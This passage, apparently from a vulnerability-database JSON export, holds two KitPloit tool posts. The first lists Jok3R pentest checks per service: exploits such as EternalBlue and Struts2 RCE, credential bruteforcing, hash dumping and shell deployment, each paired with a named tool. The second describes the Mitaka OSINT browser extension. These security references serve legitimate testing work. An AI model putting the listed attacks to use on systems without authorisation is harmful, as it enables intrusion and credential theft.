whatweb |\n | fingerprinting-app-server | recon | Fingerprint application server (JBoss, ColdFusion, Weblogic, Tomcat, Railo, Axis2, Glassfish) | clusterd |\n | fingerprinting-server-domino | recon | Fingerprint IBM/Lotus Domino server | domiowned |\n | fingerprinting-cms-wig | recon | Identify several CMS and other administrative applications | wig |\n | fingerprinting-cms-cmseek | recon | Detect CMS (130+ supported), detect version on Drupal, advanced scan on Wordpress/Joomla | cmseek |\n | fingerprinting-cms-fingerprinter | recon | Fingerprint precisely CMS versions (based on files checksums) | fingerprinter |\n | fingerprinting-cms-cmsexplorer | recon | Find plugins and themes (using bruteforce) installed in a CMS (Wordpress, Drupal, Joomla, Mambo) | cmsexplorer |\n | fingerprinting-drupal | recon | Fingerprint Drupal 7/8: users, nodes, default files, modules, themes enumeration | drupwn |\n | crawling-fast | recon | Crawl website quickly, analyze interesting files/directories | dirhunt |\n | crawling-fast2 | recon | Crawl website and extract URLs, files, intel & endpoints | photon |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ssl-check | vulnscan | Check for SSL/TLS configuration | testssl |\n | vulnscan-multi-nikto | vulnscan | Check for multiple web vulnerabilities/misconfigurations | nikto |\n | default-creds-web-multi | vulnscan | Check for default credentials on various web interfaces | changeme |\n | webdav-scan-davscan | vulnscan | Scan HTTP WebDAV | davscan |\n | webdav-scan-msf | vulnscan | Scan HTTP WebDAV | metasploit |\n | webdav-internal-ip-disclosure | vulnscan | Check for WebDAV internal IP disclosure | metasploit |\n | webdav-website-content | vulnscan | Detect webservers disclosing its content through WebDAV | metasploit |\n | http-put-check | vulnscan | Detect the support of dangerous HTTP PUT method | metasploit |\n | apache-optionsbleed-check | vulnscan | Test for the Optionsbleed bug in Apache httpd (CVE-2017-9798) | optionsbleed |\n | shellshock-scan | vulnscan | Detect if web server is vulnerable to Shellshock (CVE-2014-6271) | shocker |\n | iis-shortname-scan | vulnscan | Scan for IIS short filename (8.3) disclosure vulnerability | iis-shortname-scanner |\n | iis-internal-ip-disclosure | vulnscan | Check for IIS internal IP disclosure | metasploit |\n | tomcat-user-enum | vulnscan | Enumerate users on Tomcat 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18 | metasploit |\n | jboss-vulnscan-multi | vulnscan | Scan JBoss application server for multiple vulnerabilities | metasploit |\n | jboss-status-infoleak | vulnscan | Queries JBoss status servlet to collect [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information>) (JBoss 4.0, 4.2.2 and 4.2.3) | metasploit |\n | jenkins-infoleak | vulnscan | Enumerate a remote Jenkins-CI installation in an unauthenticated manner | metasploit |\n | cms-multi-vulnscan-cmsmap | vulnscan | Check for vulnerabilities in CMS Wordpress, Drupal, Joomla | cmsmap |\n | wordpress-vulscan | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpscan |\n | wordpress-vulscan2 | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpseku |\n | joomla-vulnscan | vulnscan | Scan for vulnerabilities in CMS Joomla | joomscan |\n | joomla-vulnscan2 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlascan |\n | joomla-vulnscan3 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlavs |\n | drupal-vulnscan | vulnscan | Scan for vulnerabilities in CMS Drupal | droopescan |\n | magento-vulnscan | vulnscan | Check for misconfigurations in CMS Magento | magescan |\n | silverstripe-vulnscan | vulnscan | Scan for vulnerabilities in CMS Silverstripe | droopescan |\n | vbulletin-vulnscan | vulnscan | Scan for vulnerabilities in CMS vBulletin | vbscan |\n | liferay-vulnscan | vulnscan | Scan for vulnerabilities in CMS Liferay | liferayscan |\n | angularjs-csti-scan | vulnscan | Scan for AngularJS Client-Side Template Injection | angularjs-csti-scanner |\n | jboss-deploy-shell | exploit | Try to deploy shell on JBoss server (jmx|web|admin-console, JMXInvokerServlet) | jexboss |\n | struts2-rce-cve2017-5638 | exploit | Exploit Apache Struts2 Jakarta Multipart parser RCE (CVE-2017-5638) | jexboss |\n | struts2-rce-cve2017-9805 | exploit | Exploit Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | struts-pwn-cve2017-9805 |\n | struts2-rce-cve2018-11776 | exploit | Exploit Apache Struts2 [misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration>) RCE (CVE-2018-11776) | struts-pwn-cve2018-11776 |\n | tomcat-rce-cve2017-12617 | exploit | Exploit for Apache Tomcat JSP Upload Bypass RCE (CVE-2017-12617) | exploit-tomcat-cve2017-12617 |\n | jenkins-cliport-deserialize | exploit | Exploit Java deserialization in Jenkins CLI port | jexboss |\n | weblogic-t3-deserialize-cve2015-4852 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2015-4852) | loubia |\n | weblogic-t3-deserialize-cve2017-3248 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2017-3248) | exploit-weblogic-cve2017-3248 |\n | weblogic-t3-deserialize-cve2018-2893 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2018-2893) | exploit-weblogic-cve2018-2893 |\n | weblogic-wls-wsat-cve2017-10271 | exploit | Exploit WLS-WSAT in Weblogic - CVE-2017-10271 | exploit-weblogic-cve2017-10271 |\n | drupal-cve-exploit | exploit | Check and exploit CVEs in CMS Drupal 7/8 (include Drupalgeddon2) (require user interaction) | drupwn |\n | bruteforce-domino | bruteforce | Bruteforce against IBM/Lotus Domino server | domiowned |\n | bruteforce-wordpress | bruteforce | Bruteforce Wordpress accounts | wpseku |\n | bruteforce-joomla | bruteforce | Bruteforce Joomla account | xbruteforcer |\n | bruteforce-drupal | bruteforce | Bruteforce Drupal account | xbruteforcer |\n | bruteforce-opencart | bruteforce | Bruteforce Opencart account | xbruteforcer |\n | bruteforce-magento | bruteforce | Bruteforce Magento account | xbruteforcer |\n | web-path-bruteforce-targeted | bruteforce | Bruteforce web paths when language is known (extensions adapted) (use raft wordlist) | dirsearch |\n | web-path-bruteforce-blind | bruteforce | Bruteforce web paths when language is unknown (use raft wordlist) | wfuzz |\n | web-path-bruteforce-opendoor | bruteforce | Bruteforce web paths using OWASP OpenDoor wordlist | wfuzz |\n | wordpress-shell-upload | postexploit | Upload shell on Wordpress if admin credentials are known | wpforce |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n\n[](<https://draft.blogger.com/null>) \n**Java-RMI (default 1099/tcp)** \n\n \n \n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Attempt to dump all objects from Java-RMI service | nmap |\n | rmi-enum | recon | Enumerate RMI services | barmie |\n | jmx-info | recon | Get information about JMX and the MBean server | twiddle |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | jmx-bruteforce | bruteforce | Bruteforce creds to connect to JMX registry | jmxbf |\n | exploit-rmi-default-config | exploit | Exploit default config in RMI Registry to load classes from any remote URL (not working against JMX) | metasploit |\n | exploit-jmx-insecure-config | exploit | Exploit JMX insecure config. Auth disabled: should be vuln. Auth enabled: vuln if weak config | metasploit |\n | jmx-auth-disabled-deploy-class | exploit | Deploy malicious MBean on JMX service with auth disabled (alternative to msf module) | sjet |\n | tomcat-jmxrmi-deserialize | exploit | Exploit Java-RMI deserialize in Tomcat (CVE-2016-8735, CVE-2016-8735), req. JmxRemoteLifecycleListener | jexboss |\n | rmi-deserialize-all-payloads | exploit | Attempt to exploit Java deserialize against Java RMI Registry with all ysoserial payloads | ysoserial |\n | tomcat-jmxrmi-manager-creds | postexploit | Retrieve Manager creds on Tomcat JMX (req. auth disabled or creds known on JMX) | jmxploit |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**JDWP (default 9000/tcp)** \n\n \n \n +------------+----------+-----------------------------------------------------+-----------------+\n | Name | Category | Description | Tool used |\n +------------+----------+-----------------------------------------------------+-----------------+\n | nmap-recon | recon | Recon using Nmap JDWP scripts | nmap |\n | jdwp-rce | exploit | Gain RCE on JDWP service (show OS/Java info as PoC) | jdwp-shellifier |\n +------------+----------+-----------------------------------------------------+-----------------+\n\n[](<https://draft.blogger.com/null>) \n**MSSQL (default 1433/tcp)** \n\n \n \n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap MSSQL scripts | nmap |\n | mssqlinfo | recon | Get technical information about a remote MSSQL server (use TDS protocol and SQL browser Server) | msdat |\n | common-creds | bruteforce | Check common/default credentials on MSSQL server | msdat |\n | bruteforce-sa-account | bruteforce | Bruteforce MSSQL \"sa\" account | msdat |\n | audit-mssql-postauth | postexploit | Check permissive privileges, methods allowing command execution, weak accounts after authenticating on MSSQL | msdat |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**MySQL (default 3306/tcp)** \n\n \n \n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | Name | Category | Description | Tool used |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | nmap-recon | recon | Recon using Nmap MySQL scripts | nmap |\n | mysql-auth-bypass-cve2012-2122 | exploit | Exploit password bypass vulnerability in MySQL - CVE-2012-2122 | metasploit |\n | default-creds | bruteforce | Check default credentials on MySQL server | patator |\n | mysql-hashdump | postexploit | Retrieve usernames and password hashes from MySQL database (req. creds) | metasploit |\n | mysql-interesting-tables-columns | postexploit | Search for interesting tables and columns in database | jok3r-scripts |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n\n[](<https://draft.blogger.com/null>) \n**Oracle (default 1521/tcp)** \n\n \n \n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | tnscmd | recon | Connect to TNS Listener and issue commands Ping, Status, Version | odat |\n | tnspoisoning | vulnscan | Test if TNS Listener is vulnerable to TNS Poisoning (CVE-2012-1675) | odat |\n | common-creds | bruteforce | Check common/default credentials on Oracle server | odat |\n | bruteforce-creds | bruteforce | Bruteforce Oracle accounts (might block some accounts !) | odat |\n | audit-oracle-postauth | postexploit | Check for privesc vectors, config leading to command execution, weak accounts after authenticating on Oracle | odat |\n | search-columns-passwords | postexploit | Search for columns storing passwords in the database | odat |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**PostgreSQL (default 5432/tcp)** \n\n \n \n +---------------+------------+------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +---------------+------------+------------------------------------------------+-----------+\n | default-creds | bruteforce | Check default credentials on PostgreSQL server | patator |\n +---------------+------------+------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**RDP (default 3389/tcp)** \n\n \n \n +----------+----------+-----------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +----------+----------+-----------------------------------------------------------------------+------------+\n | ms12-020 | vulnscan | Check for MS12-020 RCE vulnerability (any Windows before 13 Mar 2012) | metasploit |\n +---------+----------+-----------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SMB (default 445/tcp)** \n\n \n \n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | nmap-recon | recon | Recon using Nmap SMB scripts | nmap |\n | anonymous-enum-smb | recon | Attempt to perform enum (users, shares...) without account | nullinux |\n | nmap-vulnscan | vulnscan | Check for vulns in SMB (MS17-010, MS10-061, MS10-054, MS08-067...) using Nmap | nmap |\n | detect-ms17-010 | vulnscan | Detect MS17-010 SMB RCE | metasploit |\n | samba-rce-cve2015-0240 | vulnscan | Detect RCE vuln (CVE-2015-0240) in Samba 3.5.x and 3.6.X | metasploit |\n | exploit-rce-ms08-067 | exploit | Exploit for RCE vuln MS08-067 on SMB | metasploit |\n | exploit-rce-ms17-010-eternalblue | exploit | Exploit for RCE vuln MS17-010 EternalBlue on SMB | metasploit |\n | exploit-sambacry-rce-cve2017-7494 | exploit | Exploit for SambaCry RCE on Samba <= 4.5.9 (CVE-2017-7494) | metasploit |\n | auth-enum-smb | postexploit | Authenticated enumeration (users, groups, shares) on SMB | nullinux |\n | auth-shares-perm | postexploit | Get R/W permissions on SMB shares | smbmap |\n | smb-exec | postexploit | Attempt to get a remote shell (psexec-like, requires Administrator creds) | impacket |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SMTP (default 25/tcp)** \n\n \n \n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | smtp-cve | vulnscan | Scan for vulnerabilities (CVE-2010-4344, CVE-2011-1720, CVE-2011-1764, open-relay) on SMTP | nmap |\n | smtp-user-enum | vulnscan | Attempt to perform user enumeration via SMTP commands EXPN, VRFY and RCPT TO | smtp-user-enum |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**SNMP (default 161/udp)** \n\n \n \n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | common-community-strings | bruteforce | Check common community strings on SNMP server | metasploit |\n | snmpv3-bruteforce-creds | bruteforce | Bruteforce SNMPv3 credentials | snmpwn |\n | enumerate-info | postexploit | Enumerate information provided by SNMP (and check for write access) | snmp-check |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n\n[](<https://draft.blogger.com/null>) \n**SSH (default 22/tcp)** \n\n \n \n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | vulns-algos-scan | vulnscan | Scan supported algorithms and security info on SSH server | ssh-audit |\n | user-enumeration-timing-attack | exploit | Try to perform OpenSSH (versions <= 7.2 and >= 5.*) user enumeration timing attack OpenSSH | osueta |\n | default-ssh-key | bruteforce | Try to authenticate on SSH server using known SSH keys | changeme |\n | default-creds | bruteforce | Check default credentials on SSH | patator |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**Telnet (default 21/tcp)** \n\n \n \n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap Telnet scripts | nmap |\n | default-creds | bruteforce | Check default credentials on Telnet (dictionary from https://cirt.net/passwords) | patator |\n | bruteforce-root-account | bruteforce | Bruteforce \"root\" account on Telnet | patator |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n\n[](<https://draft.blogger.com/null>) \n**VNC (default 5900/tcp)** \n\n \n \n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap VNC scripts | nmap |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | bruteforce-pass | bruteforce | Bruteforce VNC password | patator |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n \n \n\n\n**[Download Jok3R](<https://github.com/koutto/jok3r>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-01-23T12:25:00", "type": "kitploit", "title": "Jok3R - Network And Web Pentest Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4344", "CVE-2011-1720", "CVE-2011-1764", "CVE-2012-1675", "CVE-2012-2122", "CVE-2014-6271", "CVE-2015-0240", "CVE-2015-4852", "CVE-2016-8735", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-3248", "CVE-2017-5638", "CVE-2017-7494", "CVE-2017-9798", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-2893"], "modified": "2019-01-23T12:25:12", "id": "KITPLOIT:5052987141331551837", "href": "http://www.kitploit.com/2019/01/jok3r-network-and-web-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:00:23", "description": "[![](https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s640/mitaka_8_eyecatch.png)](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [OSINT](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract & refang IoC from a selected block of text. \n * E.g. `example[.]com` to `example.com`, `test[at]example.com` to `some-email@example.com`, `hxxp://example.com` to `http://example.com`, etc.\n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc.\n \n**Features** \n \n**Supported IOC types** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | `8.8.8.8` \ndomain | Domain name | `github.com` \nurl | URL | `https://github.com` \nemail | Email address | `some-email@example.com` \nasn | ASN | `AS13335` \nhash | md5 / sha1 / sha256 | `44d88612fea8a8f36de82e1278abb02f` \ncve | CVE number | `CVE-2018-11776` \nbtc | BTC address | `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` \ngaPubID | Google Adsense Publisher ID | `pub-9383614236930773` \ngaTrackID | Google [Analytics](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | `UA-67609351-1` \n \n**Supported search engines** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [https://www.abuseipdb.com](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [https://archive.org](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [http://archive.fo](<http://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [https://bgpview.io](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [https://app.binaryedge.io](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [https://www.bitcoinabuse.com](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc \nBlockchain.com | [https://www.blockchain.com](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [https://live.blockcypher.com](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [https://censys.io](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [https://crt.sh](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [https://dnslytics.com](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [https://domainbigdata.com](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [https://www.domaintools.com](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [https://domainwat.ch](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [https://emailrep.io](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [https://findsubdomains.com](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [https://fofa.so](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [https://fortiguard.com](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [https://transparencyreport.google.com](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [https://viz.greynoise.io](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [https://hashdd.com](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [https://www.hybrid-analysis.com](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [https://intelx.io](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [https://ipinfo.io](<https://ipinfo.io/> \"https://ipinfo.io\" ) | ip / asn \nIPIP | [https://en.ipip.net](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [https://www.joesandbox.com](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [https://malshare.com](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [https://www.maltiverse.com](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [https://nvd.nist.gov](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [https://data.occrp.org](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [https://www.onyphe.io](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [https://otx.alienvault.com](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [http://pub-db.com](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [https://publicwww.com](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [https://pulsedive.com](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [http://community.riskiq.com](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [https://securitytrails.com](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [https://www.shodan.io](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [https://sploitus.com](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [http://spyonweb.com](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [https://talosintelligence.com](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [https://app.threatconnect.com](<https://app.threatconnect.com/> \"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [https://www.threatcrowd.org](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [https://www.threatminer.org](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [https://threatintelligenceplatform.com](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [https://viewdns.info](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [https://vulmon.com](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [https://www.vulncode-db.com](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [http://vxcube.com](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [https://wa-com.com](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [https://weleakinfo.com](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [https://exchange.xforce.ibmcloud.com](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [https://www.zoomeye.org](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n**Supported scan engines** \nname | url | supported types \n---|---|--- \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n**Downloads** \n\n\n * Chrome: <https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg>\n * FireFox: <https://addons.mozilla.org/en-US/firefox/addon/mitaka/>\n \n**How to use** \nThis browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on. \n \n**Examples:** \n \n\n\n[![](https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s640/mitaka_9_1.gif)](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[![](https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s640/mitaka_10_2.gif)](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n**Note:** \nPlease set your urlscan.io & [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page for enabling urlscan.io & VirusTotal scans. \n \n**Options** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[![](https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s640/mitaka_11_options.png)](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n**About Permissons** \nThis browser extension requires the following permissions. \n\n\n * `Read and change all your data on the websites you visit`: \n * This extension creates context menus dynamically based on what you select on a website.\n * It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites)\n * `Display notifications`: \n * This extension makes a notification when something goes wrong.\nI don't (and will never) collect any information from the users. \n \n**Alternatives or Similar Tools** \n\n\n * [CrowdScrape](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [Gotanda](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" )\n * [Sputnik](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" )[Chrome](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension\n * [ThreatPinch Lookup](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [VTchromizer](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n**How to build (for developers)** \nThis browser extension is written in [TypeScript](<https://www.typescriptlang.org/> \"TypeScript\" ) and built by [webpack](<https://webpack.js.org/> \"webpack\" ). \nTypeScript files will start out in `src` directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in `dist` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nFor loading an unpacked extension, please follow the procedures described at <https://developer.chrome.com/extensions/getstarted>. \n \n**Misc** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. \n \n \n\n\n**[Download Mitaka](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": 